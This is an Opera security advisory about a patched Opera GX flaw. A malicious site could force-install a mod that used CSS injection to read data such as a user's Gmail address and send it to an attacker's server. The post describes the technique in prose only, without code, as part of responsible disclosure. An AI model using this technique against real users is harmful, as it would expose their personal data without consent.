News, Security

Security fix: Addressing a GX mods vulnerability

Security fix: Addressing a GX mods vulnerability

Hi Opera users,

Recently, an independent security researcher responsibly disclosed a vulnerability in Opera GX. The vulnerability, which has since been patched, took advantage of our mods functionality. After investigating the researcher’s findings, we took immediate action, and a fix is already in place. If you are running Opera GX version 130.0.5847.89 and later, you have received the fix as well.

Browser security is something we take very seriously at Opera. And part of being serious about security is being transparent. We have written before about how Opera works with independent security researchers who work hard to identify vulnerabilities in our products and alert us to them so we can fix them before they can be exploited by bad actors. 

After patching, some researchers choose to reveal the vulnerabilities they found and their methods, so that the broader security community can benefit from the shared knowledge. This is called responsible disclosure, and it is common practice across the software industry. 

It’s also the reason why things like bug bounties exist – so that these researchers can be rewarded for their efforts in helping to keep the software we use every day safe and secure. Opera’s own bug bounty program can be found here.

Vulnerability analysis

Researchers zhero_ and inzo_ discovered that, under specific conditions, a third-party website could be set up to force the installation of a mod on Opera GX. As mods on GX, especially on the GX Store, can be applied without additional confirmation steps, the researchers found they could take advantage of this to force a malicious mod to be installed upon arrival to the malicious page.

Once installed, such a mod could use advanced Cascading Style Sheets (CSS) injection rules to read specific data attributes on pages you visit – such as a username or email address – and send that data back to an attacker’s server by loading unique, tracker-like URLs.

As a proof of concept, the researchers demonstrated how a malicious site could force-install a mod, automatically redirect a logged-in user to a Google account page, and use CSS selectors to exfiltrate the user’s Gmail address.

Triage and fix

The vulnerability was initially reported through our bug bounty program on Bugcrowd. Once our team had an opportunity to triage the bug submission, we moved to address the vulnerability. We updated our mod installation pipeline to ensure that no such mod can be downloaded and enabled without explicit user interaction and clear confirmation.

The issue was fixed as of Opera GX version 130.0.5847.89. If your Opera GX browser is up-to-date, you have already received the patched version.

After thoroughly investigating our systems and traffic, we are quite confident that the vulnerability was never exploited in the wild. The attack was not only complicated to set up, but for it to work, a very specific set of circumstances was required, which made it harder for a user to be affected.

Specifically, the user would have to be goaded into visiting the specific malicious website that would have to have been set up for this purpose, find themselves with a fresh mod installed, and ignore the corresponding message (which also includes a button to remove the mod), giving time to the redirect to go forward.

What happens next

We want to extend our sincere thanks to the security researchers zhero_ and inzo_ who discovered and reported the issue to us. Their innovative thinking and collaborative approach show how important independent researchers are to the effort of keeping the web safe for users.

If you notice any vulnerabilities in Opera, please reach out to us – our bug bounty program is the most effective way to do that. You can also get in touch with our Security team directly. And of course, make sure to have the latest updates in your software installed; this is the best way to ensure you are protected!

As always, stay safe out there!


User comments



Opera

You deserve a better browser

Opera's free VPN, Ad blocker, and Flow file sharing. Just a few of the must-have features built into Opera for faster, smoother and distraction-free browsing designed to improve your online experience.

Download now